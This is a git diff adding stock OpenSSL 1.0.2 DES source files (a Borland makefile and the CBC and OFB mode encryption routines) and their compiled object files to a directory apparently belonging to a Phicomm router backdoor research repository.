z(Dq2|RCs%2<5$bfNWquOd1PzziqMwTkpdpsnB5qOS&_BdBhl@V9KAfF!4`<^kNHdw
zLmB_!Qp{e|i&upd%Edmq3(=pT3?oEmN`?_)nL`e#>@8lf3b%QII8~0|TZ>=dulT~E
zLkH`RA5E24CJr+1@<`QjW?H+-ckN8oSJXAAxw(1;cw#H@o1J$@Ea0bS{zx<&uT51{
zvP46w-nECltNQAiibSgVSc)a8DpD0JQQ6SI5(kge)>hZSS9c^;oj^@&Zb(%e{8-<A
zRM(g|T7Tqdb$#kMOQ<(gA1*&sUr}4_Z~1R7VpvSvr!!Lw9}O>$?wvc=yC%CHKdRqi
z{DNa#Cyw$@gK|gvc#L}fm$W~<lAe#?L54x^2#!s-p?5y+dIM|eodx&>hqwQ$K_{-g
z{XM%a;0sPI{+sc?jYU-bi)sk>-uf7>gTu?8=c~j8#ge}MfZqRrH&NU4_50w@#9xm7
zXgr>XKU(Xp_xzdmrmed4{y92P&%*aihV|r2=MFB`qw6Q1ZUV#0yXSfi7n#<_bo@2m
JL~Ya8{{>bYCNls4

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/makefile.bc b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/makefile.bc
new file mode 100644
index 0000000..1fe6d49
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/makefile.bc
@@ -0,0 +1,50 @@
+#
+# Origional BC Makefile from Teun <Teun.Nijssen@kub.nl>
+#
+#
+CC      = bcc
+TLIB    = tlib /0 /C
+# note: the -3 flag produces code for 386, 486, Pentium etc; omit it for 286s
+OPTIMIZE= -3 -O2
+#WINDOWS= -W
+CFLAGS  = -c -ml -d $(OPTIMIZE) $(WINDOWS) -DMSDOS
+LFLAGS  = -ml $(WINDOWS)
+
+.c.obj:
+	$(CC) $(CFLAGS) $*.c
+
+.obj.exe:
+	$(CC) $(LFLAGS) -e$*.exe $*.obj libdes.lib  
+
+all: $(LIB) destest.exe rpw.exe des.exe speed.exe
+
+# "make clean": use a directory containing only libdes .exe and .obj files...
+clean:
+	del *.exe
+	del *.obj
+	del libdes.lib
+	del libdes.rsp
+
+OBJS=   cbc_cksm.obj cbc_enc.obj  ecb_enc.obj  pcbc_enc.obj \
+	qud_cksm.obj rand_key.obj set_key.obj  str2key.obj \
+	enc_read.obj enc_writ.obj fcrypt.obj   cfb_enc.obj \
+	ecb3_enc.obj ofb_enc.obj  cbc3_enc.obj read_pwd.obj\
+	cfb64enc.obj ofb64enc.obj ede_enc.obj  cfb64ede.obj\
+	ofb64ede.obj supp.obj
+
+LIB=    libdes.lib
+
+$(LIB): $(OBJS)
+	del $(LIB)
+	makersp "+%s &\n" &&|
+	$(OBJS)
+|       >libdes.rsp
+	$(TLIB) libdes.lib @libdes.rsp,nul
+	del libdes.rsp
+
+destest.exe: destest.obj libdes.lib
+rpw.exe:     rpw.obj libdes.lib
+speed.exe:   speed.obj libdes.lib
+des.exe:     des.obj libdes.lib
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ncbc_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ncbc_enc.c
new file mode 100644
index 0000000..ab267cb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ncbc_enc.c
@@ -0,0 +1,154 @@
+/* crypto/des/ncbc_enc.c */
+/*-
+ * #included by:
+ *    cbc_enc.c  (DES_cbc_encrypt)
+ *    des_enc.c  (DES_ncbc_encrypt)
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+
+#ifdef CBC_ENC_C__DONT_UPDATE_IV
+void DES_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
+                     DES_key_schedule *_schedule, DES_cblock *ivec, int enc)
+#else
+void DES_ncbc_encrypt(const unsigned char *in, unsigned char *out,
+                      long length, DES_key_schedule *_schedule,
+                      DES_cblock *ivec, int enc)
+#endif
+{
+    register DES_LONG tin0, tin1;
+    register DES_LONG tout0, tout1, xor0, xor1;
+    register long l = length;
+    DES_LONG tin[2];
+    unsigned char *iv;
+
+    iv = &(*ivec)[0];
+
+    if (enc) {
+        c2l(iv, tout0);
+        c2l(iv, tout1);
+        for (l -= 8; l >= 0; l -= 8) {
+            c2l(in, tin0);
+            c2l(in, tin1);
+            tin0 ^= tout0;
+            tin[0] = tin0;
+            tin1 ^= tout1;
+            tin[1] = tin1;
+            DES_encrypt1((DES_LONG *)tin, _schedule, DES_ENCRYPT);
+            tout0 = tin[0];
+            l2c(tout0, out);
+            tout1 = tin[1];
+            l2c(tout1, out);
+        }
+        if (l != -8) {
+            c2ln(in, tin0, tin1, l + 8);
+            tin0 ^= tout0;
+            tin[0] = tin0;
+            tin1 ^= tout1;
+            tin[1] = tin1;
+            DES_encrypt1((DES_LONG *)tin, _schedule, DES_ENCRYPT);
+            tout0 = tin[0];
+            l2c(tout0, out);
+            tout1 = tin[1];
+            l2c(tout1, out);
+        }
+#ifndef CBC_ENC_C__DONT_UPDATE_IV
+        iv = &(*ivec)[0];
+        l2c(tout0, iv);
+        l2c(tout1, iv);
+#endif
+    } else {
+        c2l(iv, xor0);
+        c2l(iv, xor1);
+        for (l -= 8; l >= 0; l -= 8) {
+            c2l(in, tin0);
+            tin[0] = tin0;
+            c2l(in, tin1);
+            tin[1] = tin1;
+            DES_encrypt1((DES_LONG *)tin, _schedule, DES_DECRYPT);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2c(tout0, out);
+            l2c(tout1, out);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        if (l != -8) {
+            c2l(in, tin0);
+            tin[0] = tin0;
+            c2l(in, tin1);
+            tin[1] = tin1;
+            DES_encrypt1((DES_LONG *)tin, _schedule, DES_DECRYPT);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2cn(tout0, tout1, out, l + 8);
+#ifndef CBC_ENC_C__DONT_UPDATE_IV
+            xor0 = tin0;
+            xor1 = tin1;
+#endif
+        }
+#ifndef CBC_ENC_C__DONT_UPDATE_IV
+        iv = &(*ivec)[0];
+        l2c(xor0, iv);
+        l2c(xor1, iv);
+#endif
+    }
+    tin0 = tin1 = tout0 = tout1 = xor0 = xor1 = 0;
+    tin[0] = tin[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64ede.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64ede.c
new file mode 100644
index 0000000..45c6750
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64ede.c
@@ -0,0 +1,123 @@
+/* crypto/des/ofb64ede.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+
+/*
+ * The input and output encrypted as though 64bit ofb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+void DES_ede3_ofb64_encrypt(register const unsigned char *in,
+                            register unsigned char *out, long length,
+                            DES_key_schedule *k1, DES_key_schedule *k2,
+                            DES_key_schedule *k3, DES_cblock *ivec, int *num)
+{
+    register DES_LONG v0, v1;
+    register int n = *num;
+    register long l = length;
+    DES_cblock d;
+    register char *dp;
+    DES_LONG ti[2];
+    unsigned char *iv;
+    int save = 0;
+
+    iv = &(*ivec)[0];
+    c2l(iv, v0);
+    c2l(iv, v1);
+    ti[0] = v0;
+    ti[1] = v1;
+    dp = (char *)d;
+    l2c(v0, dp);
+    l2c(v1, dp);
+    while (l--) {
+        if (n == 0) {
+            /* ti[0]=v0; */
+            /* ti[1]=v1; */
+            DES_encrypt3(ti, k1, k2, k3);
+            v0 = ti[0];
+            v1 = ti[1];
+
+            dp = (char *)d;
+            l2c(v0, dp);
+            l2c(v1, dp);
+            save++;
+        }
+        *(out++) = *(in++) ^ d[n];
+        n = (n + 1) & 0x07;
+    }
+    if (save) {
+/*-     v0=ti[0];
+        v1=ti[1];*/
+        iv = &(*ivec)[0];
+        l2c(v0, iv);
+        l2c(v1, iv);
+    }
+    v0 = v1 = ti[0] = ti[1] = 0;
+    *num = n;
+}
+
+#ifdef undef                    /* MACRO */
+void DES_ede2_ofb64_encrypt(register unsigned char *in,
+                            register unsigned char *out, long length,
+                            DES_key_schedule k1, DES_key_schedule k2,
+                            DES_cblock (*ivec), int *num)
+{
+    DES_ede3_ofb64_encrypt(in, out, length, k1, k2, k1, ivec, num);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64ede.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64ede.o
new file mode 100644
index 0000000000000000000000000000000000000000..8f50beb10642ef5d31a75f13bb643ad3a8abd290
GIT binary patch
literal 1928
zcmbu8&1(}u6u>7RHLb=qiibi=3Ajo`yChA~v=qstO){0mf=z5e>ynSHkv2(5HrPth
zL#eo~)%Mmuz(2u1pjeA|@htQrcoFp?;z3c?H@h?D!|g>M4DY?)zW3(s%$xg3Ipub_
z5EmD^gqj|w2oZ17j$39N9Yuch_1M4<Jd=!=_!`bm>c4O%OZ0C<e=|*7AIaM1S=o3d
zZbE`=JQue?7m49L9Rh>s6C#Q15IrMyW5X|EV?y*!8e?D#=&~4t&tpVi72{-MRg965
zMX_5et?xI8tiP7^7c#_zu=z@cxFFFrv6lu1KG5EXkr87C)PRy>G8iEltROM0s0@@e
zAXF~w<40LU%sq2AF_h_#Pnvsc?|l!m=BKUXx~cVG9lC<@UaSugC_suNYWJ>n+54=$
zoV`AWZ{Rt66DzwYJw84f3}y3;iq;5@NKq*~7`fQ6+{nG5uoNCXYh#4yaRy*@!Af7r
zA~!-ilzCuLIcY28x_cG5mIJOnzpr}}E=C64&%XKTMWuwmQ+HD6ed0+7!3}Rx2tDq?
zLioX<v=CeKrG-tG`<)O2f`t%7B!u3C5J(8!tj0l#miD4Arqg$i<Al)OdH3yE9_w%0
z8TCBq(BIJFz5}>(*B<K>+f)4Do@nXQIxAqOV9|5$lo0?<Jaqs^)%pB|VYR4A1vHVI
zR=|oX7E{zpp|-N5AtfzOC9tearBc($jFQ0#IjPvec0?2@N?pqp7L-D1L7C6pUPNe%
zHAZLQ2&|u`E#F%>{Ws2ojKloU8ET4DUny(3Jd)~K&DJGu)zrnDq^Zjql8QMkhopSH
zj-*1hTvjW<DpgIDU?vBx-k5)@(vX&F)g`s2tsu#&pq7;RTCS`%_xukl2)T6TIwv9y
zj0(R$+p}Z2O?4kEdS-E0t+L5RGR)v%&~zU@Nxh7pVZ3vKWg6@to%lS&(3=06AAww2
zllKXxC4B#L95BuI=Xw-4w_8K+I6;Tl%fRTXYnvhPmsx%g>{j9D$5|c>8rqq^&GJh;
zkm=6+Ip9wBx5EyU-xIw*n#=P!ciP+9iZv8teb6`6<B(5T=iSl#7=ts^X%SZL4>=B&
OQ~p~9;c2%?XZ~;dV%dQJ

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64enc.c
new file mode 100644
index 0000000..8e72dec
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64enc.c
@@ -0,0 +1,109 @@
+/* crypto/des/ofb64enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+
+/*
+ * The input and output encrypted as though 64bit ofb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+void DES_ofb64_encrypt(register const unsigned char *in,
+                       register unsigned char *out, long length,
+                       DES_key_schedule *schedule, DES_cblock *ivec, int *num)
+{
+    register DES_LONG v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    DES_cblock d;
+    register unsigned char *dp;
+    DES_LONG ti[2];
+    unsigned char *iv;
+    int save = 0;
+
+    iv = &(*ivec)[0];
+    c2l(iv, v0);
+    c2l(iv, v1);
+    ti[0] = v0;
+    ti[1] = v1;
+    dp = d;
+    l2c(v0, dp);
+    l2c(v1, dp);
+    while (l--) {
+        if (n == 0) {
+            DES_encrypt1(ti, schedule, DES_ENCRYPT);
+            dp = d;
+            t = ti[0];
+            l2c(t, dp);
+            t = ti[1];
+            l2c(t, dp);
+            save++;
+        }
+        *(out++) = *(in++) ^ d[n];
+        n = (n + 1) & 0x07;
+    }
+    if (save) {
+        v0 = ti[0];
+        v1 = ti[1];
+        iv = &(*ivec)[0];
+        l2c(v0, iv);
+        l2c(v1, iv);
+    }
+    t = v0 = v1 = ti[0] = ti[1] = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb64enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..b42892b263ae45756c68725015fc5e7c0aab6829
GIT binary patch
literal 1888
zcmbu8&1(};5WruWw24~RC>2sFB}kNr?UJ-b(;g%*&88dK+R`?9(7GgPYNYuh*+8qJ
zLa4aLsz?6?Z(j9OXw{n@ya?X32SGtZyoj*QY~C{;ZZA6Uc4mG%^WN;d*;|ql>$2Gh
z7aKW4njWWwcpXhUY?@)RpY)RN2L^xA3vu0`=co0TG!fT-&;=>DlbDxlUu0S@IcPn!
zB-b6s{E#K<QC}#y8Ltys@0T}nKEHm$=SLcdZ$u9hUGoj0=TgRVK9@GT{=OQN_1Dj_
zB3b{c=!(xH!^2ID?N3;RT#x$vN*ysg+~!Vl`YpZZj2kbEt&wP7Aa1;>eRR^hlJWV8
zw7#Rc%$&I1L-l?%p}NsVby|00&)T+pagko4i}W&8x5(7w<b>CsNL343)jKYZih<$a
z>8j}lZ;k}Sz}Sff#)7a-Zdl#0rp_fu7a^O-?66S!8j9Gi%@NzG+cwbabUlL4Q-B{~
z?>?Z83GRnolHhq@mjv&ILlXS=yQ4zjP7f7AHD^?~ZR>g_gs2dpf<Gd7BZ4O)xFdp#
z?XjD}PCCdp!|J`=^5(I2UVVF(-Tc~ihMt}D{0&X++=W|LZ8y8vp3)2Mp_V$$UI80~
zg?;aoF#uMa?!rlNIdy6*Q%H+x5|!pv(^bJQuaz{SPAM}Hs;D!u*u1o$F3^Y~sb(CD
z2ohDTXvy@7n$E7M%gL)bR?u~(aTfN$`eiiaO$*0w<J`+Q%n!~`Q^d+zUQ4EkSkcN2
zo#j?JlS_(PW>q8NQc_D2F;%G$F<s2(GX-FUqLvY1CWp-enSZ5F6-(t}DO1+gh-mJR
z$*RlcWIoe8^FJ&v<l@YAPDB_O3ctUG*NEjd>H%2TvoNey$+D3QFt`^qp2H`}!}xK=
zJ16)k23trc9)cL$^I!9Wkc)frI>9uBpMR1Aruq3?PXOn3Yv{BUw1_<m4F9^e83KQn
z<$J+y72ZG2Qea?cXMTz0XL%sgo%xHvt?utJYbd`byg$t4`J7vwjYqv>=ZBcae`=3K
hKC;fc14P^m&Y{yHY`Z_?AXrxUPZ{L@H&5uy{|!51%CrCg

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb_enc.c
new file mode 100644
index 0000000..02a7877
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb_enc.c
@@ -0,0 +1,131 @@
+/* crypto/des/ofb_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+
+/*
+ * The input and output are loaded in multiples of 8 bits. What this means is
+ * that if you hame numbits=12 and length=2 the first 12 bits will be
+ * retrieved from the first byte and half the second.  The second 12 bits
+ * will come from the 3rd and half the 4th byte.
+ */
+void DES_ofb_encrypt(const unsigned char *in, unsigned char *out, int numbits,
+                     long length, DES_key_schedule *schedule,
+                     DES_cblock *ivec)
+{
+    register DES_LONG d0, d1, vv0, vv1, v0, v1, n = (numbits + 7) / 8;
+    register DES_LONG mask0, mask1;
+    register long l = length;
+    register int num = numbits;
+    DES_LONG ti[2];
+    unsigned char *iv;
+
+    if (num > 64)
+        return;
+    if (num > 32) {
+        mask0 = 0xffffffffL;
+        if (num >= 64)
+            mask1 = mask0;
+        else
+            mask1 = (1L << (num - 32)) - 1;
+    } else {
+        if (num == 32)
+            mask0 = 0xffffffffL;
+        else
+            mask0 = (1L << num) - 1;
+        mask1 = 0x00000000L;
+    }
+
+    iv = &(*ivec)[0];
+    c2l(iv, v0);
+    c2l(iv, v1);
+    ti[0] = v0;
+    ti[1] = v1;
+    while (l-- > 0) {
+        ti[0] = v0;
+        ti[1] = v1;
+        DES_encrypt1((DES_LONG *)ti, schedule, DES_ENCRYPT);
+        vv0 = ti[0];
+        vv1 = ti[1];
+        c2ln(in, d0, d1, n);
+        in += n;
+        d0 = (d0 ^ vv0) & mask0;
+        d1 = (d1 ^ vv1) & mask1;
+        l2cn(d0, d1, out, n);
+        out += n;
+
+        if (num == 32) {
+            v0 = v1;
+            v1 = vv0;
+        } else if (num == 64) {
+            v0 = vv0;
+            v1 = vv1;
+        } else if (num > 32) {  /* && num != 64 */
+            v0 = ((v1 >> (num - 32)) | (vv0 << (64 - num))) & 0xffffffffL;
+            v1 = ((vv0 >> (num - 32)) | (vv1 << (64 - num))) & 0xffffffffL;
+        } else {                /* num < 32 */
+
+            v0 = ((v0 >> num) | (v1 << (32 - num))) & 0xffffffffL;
+            v1 = ((v1 >> num) | (vv0 << (32 - num))) & 0xffffffffL;
+        }
+    }
+    iv = &(*ivec)[0];
+    l2c(v0, iv);
+    l2c(v1, iv);
+    v0 = v1 = d0 = d1 = ti[0] = ti[1] = vv0 = vv1 = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ofb_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..bfc4b9bbc65998717a0fe7d5b646888639be1ce6
GIT binary patch
literal 3016
